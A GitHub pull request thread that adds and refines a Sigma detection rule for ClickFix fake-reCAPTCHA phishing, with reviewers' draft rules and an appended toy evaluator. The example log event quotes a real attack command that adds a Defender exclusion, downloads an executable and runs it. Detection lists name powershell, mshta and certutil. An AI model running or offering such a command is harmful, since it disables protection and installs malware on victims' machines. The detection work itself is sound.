
Adding rule for detecting recaptcha phish process executions #5218

Open
wants to merge 3 commits into base: master

Conversation

montysecurity

Summary of the Pull Request

Adding rule for detecting recaptcha phish process executions

Changelog

New: proc_creation_win_powershell_fake_captcha.yml

Example Log Event

cmd /c "powershell Add-MpPreference -ExclusionPath 'C:\' && timeout 2 && powershell Invoke-WebRequest -Uri 'http://book[.]rollingvideogames[.]com/temp/1.exe' -OutFile '%TEMP%\1.exe' && start %TEMP%\1.exe" # ✅ ''I am not a robot - reCAPTCHA Verification ID: 1212''

Reference: https://www.zscaler.com/blogs/security-research/deepseek-lure-using-captchas-spread-malware

Fixed Issues

N/A

SigmaHQ Rule Creation Conventions

  • If your PR adds new rules, please consider following and applying these conventions

@github-actions github-actions bot added Rules Windows Pull request add/update windows related rules labels Mar 1, 2025

@github-actions github-actions bot left a comment


Welcome @montysecurity 👋

It looks like this is your first pull request on the Sigma rules repository!

Please make sure to read the SigmaHQ conventions document to make sure your contribution is adhering to best practices and has all the necessary elements in place for a successful approval.

Thanks again, and welcome to the Sigma community! 😃

@swachchhanda000
Contributor

swachchhanda000 commented Mar 4, 2025

Hi
I have observed other patterns among malware abusing this ClickFix technique and adjusted @montysecurity's rules accordingly. His rule was slightly incorrect as well because, for the log event given in his example, the Image will be cmd.exe for ParentImage explorer.exe, not powershell.exe.

That's why I added them on CommandLine, not on Image, just to be safe.

proc_creation_win_susp_clickfix_execution_pattern.yml

title: Potential ClickFix Execution Pattern
id: d487ed4a-fd24-436d-a0b2-f4e95f7b2635
status: experimental
description: |
    Detects potential ClickFix execution patterns leveraging social engineering techniques where users are tricked into running malicious commands via clipboard manipulation.
    This attack starts with users visiting malicious websites, often impersonating legitimate news or service platforms.
    These websites display fake CAPTCHA challenges labeled as "I am not a robot - reCAPTCHA Verification," instructing users to press Windows + R, paste clipboard contents into the Run dialog, and execute the command.
    The clipboard content typically contains mshta.exe or powershell.exe commands that download and execute malware, such as Lumma Stealer or other information stealers.
    This technique exploits user trust and bypasses traditional malware defenses by relying on user interaction.
references:
    - https://github.com/JohnHammond/recaptcha-phish
    - https://www.zscaler.com/blogs/security-research/deepseek-lure-using-captchas-spread-malware
    - https://www.threatdown.com/blog/clipboard-hijacker-tries-to-install-a-trojan/
    - https://app.any.run/tasks/5c16b4db-4b36-4039-a0ed-9b09abff8be2
    - https://www.esentire.com/security-advisories/netsupport-rat-clickfix-distribution
author: montysecurity, Swachchhanda Shrawan Poudel(Nextron Systems)
date: 2025-03-04
tags:
    - attack.execution
    - attack.t1204.001
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith: '\explorer.exe'
    selection_cmd_1:
        CommandLine|contains:
            - 'I am not a robot - reCAPTCHA Verification'
            - 'Verify you are human - Ray Verification ID:'
    selection_cmd_2:
        CommandLine|contains:
            - 'mshta'
            - 'powershell'
            # Add more potentially suspicious executables used for malware download/execution
    condition: all of selection_*
falsepositives:
    - Highly unlikely
level: high

cc @nasbench, @frack113

@montysecurity
Author

Good eye and thanks for the assist @swachchhanda000 !

@nasbench
Member

nasbench commented Mar 5, 2025

You do not need the CLI for the binaries as the captcha strings are enough.

@nasbench nasbench added the 2nd Review Needed PR need a second approval label Mar 5, 2025
@nasbench nasbench requested a review from frack113 March 5, 2025 00:21
@swachchhanda000
Contributor

swachchhanda000 commented Mar 6, 2025

@montysecurity
Author

@swachchhanda000 What about something like this? Going for the more generic approach.

title: Potential ClickFix Execution Pattern
id: d487ed4a-fd24-436d-a0b2-f4e95f7b2635
status: experimental
description: |
    Detects potential ClickFix execution patterns leveraging social engineering techniques where users are tricked into running malicious commands via clipboard manipulation.
    This attack starts with users visiting malicious websites, often impersonating legitimate news or service platforms.
    These websites display fake CAPTCHA challenges labeled as "I am not a robot - reCAPTCHA Verification," instructing users to press Windows + R, paste clipboard contents into the Run dialog, and execute the command.
    The clipboard content typically contains mshta.exe or powershell.exe commands that download and execute malware, such as Lumma Stealer or other information stealers.
    This technique exploits user trust and bypasses traditional malware defenses by relying on user interaction.
references:
    - https://github.com/JohnHammond/recaptcha-phish
    - https://www.zscaler.com/blogs/security-research/deepseek-lure-using-captchas-spread-malware
    - https://www.threatdown.com/blog/clipboard-hijacker-tries-to-install-a-trojan/
    - https://app.any.run/tasks/5c16b4db-4b36-4039-a0ed-9b09abff8be2
    - https://www.esentire.com/security-advisories/netsupport-rat-clickfix-distribution
author: montysecurity, Swachchhanda Shrawan Poudel(Nextron Systems)
date: 2025-03-04
tags:
    - attack.execution
    - attack.t1204.001
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith: '\explorer.exe'
    selection_cmd_1:
        CommandLine|contains:
            - 'robot'
            - 'captcha'
            - 'recaptcha'
            - 'human'
            - 'verify'
            - 'verification'
    selection_cmd_2:
        CommandLine|contains:
            - '#' # PowerShell Comment
    selection_cmd_3:
        CommandLine|contains:
            - 'mshta'
            - 'powershell'
            - 'certutil'
            - 'scrobj.dll'
            # Add more potentially suspicious executables used for malware download/execution
    selection_cmd_4:
        CommandLine|contains:
            - 'https://'
            - 'http://'
    condition: all of selection_*
falsepositives:
    - Highly unlikely
level: high

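To see how the two drafts in this thread behave side by side, here is an added toy evaluator (not SigmaHQ tooling) that implements only the modifiers the drafts use and runs both rules over constructed process-creation events; the URLs and paths in the events are placeholders, and the `benign_keywords` event is a made-up keyword-rich but harmless command line.

```python
# Added example, not SigmaHQ code: evaluates the two ClickFix rule drafts from this
# thread over constructed events. Supports only |endswith, |contains and "all of selection_*".

def match_field(value, modifier, patterns):
    v = value.lower()  # Sigma string matching is case-insensitive; a list is OR-ed
    pats = [p.lower() for p in patterns]
    if modifier == "endswith":
        return any(v.endswith(p) for p in pats)
    if modifier == "contains":
        return any(p in v for p in pats)
    raise ValueError("unsupported modifier: " + modifier)

def rule_matches(selections, event):
    # "all of selection_*": every selection, and every field inside it, must match.
    for fields in selections.values():
        for key, patterns in fields.items():
            field, modifier = key.split("|")
            if not match_field(event.get(field, ""), modifier, patterns):
                return False
    return True

SPECIFIC = {  # swachchhanda000's draft: exact lure strings
    "selection_parent": {"ParentImage|endswith": ["\\explorer.exe"]},
    "selection_cmd_1": {"CommandLine|contains": ["I am not a robot - reCAPTCHA Verification", "Verify you are human - Ray Verification ID:"]},
    "selection_cmd_2": {"CommandLine|contains": ["mshta", "powershell"]},
}
GENERIC = {  # montysecurity's generic draft: keywords + '#' + URL scheme
    "selection_parent": {"ParentImage|endswith": ["\\explorer.exe"]},
    "selection_cmd_1": {"CommandLine|contains": ["robot", "captcha", "recaptcha", "human", "verify", "verification"]},
    "selection_cmd_2": {"CommandLine|contains": ["#"]},
    "selection_cmd_3": {"CommandLine|contains": ["mshta", "powershell", "certutil", "scrobj.dll"]},
    "selection_cmd_4": {"CommandLine|contains": ["https://", "http://"]},
}

# Constructed events (URLs/paths are placeholders). As the thread notes, the PR's example
# runs cmd.exe under explorer.exe, so the lure must be matched on CommandLine, not Image.
EVENTS = {
    "pr_example": {"Image": "C:\\Windows\\System32\\cmd.exe", "ParentImage": "C:\\Windows\\explorer.exe",
        "CommandLine": "cmd /c 'powershell Invoke-WebRequest -Uri http://example.invalid/1.exe' # 'I am not a robot - reCAPTCHA Verification ID: 1212'"},
    "reworded_lure": {"Image": "C:\\Windows\\System32\\mshta.exe", "ParentImage": "C:\\Windows\\explorer.exe",
        "CommandLine": "mshta https://example.invalid/v.hta # Verification ID: 7788 - confirm you are human"},
    "benign_keywords": {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe",
        "CommandLine": "powershell -File C:\\tools\\verify_captcha.ps1 # docs: https://wiki.example.invalid"},
    "benign": {"Image": "C:\\Windows\\System32\\cmd.exe", "ParentImage": "C:\\Windows\\explorer.exe",
        "CommandLine": "cmd /c dir %TEMP%"},
}

def evaluate():  # {event name: (specific draft fires?, generic draft fires?)}
    return {name: (rule_matches(SPECIFIC, ev), rule_matches(GENERIC, ev)) for name, ev in EVENTS.items()}
```

Running `evaluate()` shows the trade-off the thread is weighing: the reworded lure is caught only by the generic draft, but so is the keyword-rich benign command line, so the generic version buys coverage at the cost of the "Highly unlikely" false-positive claim.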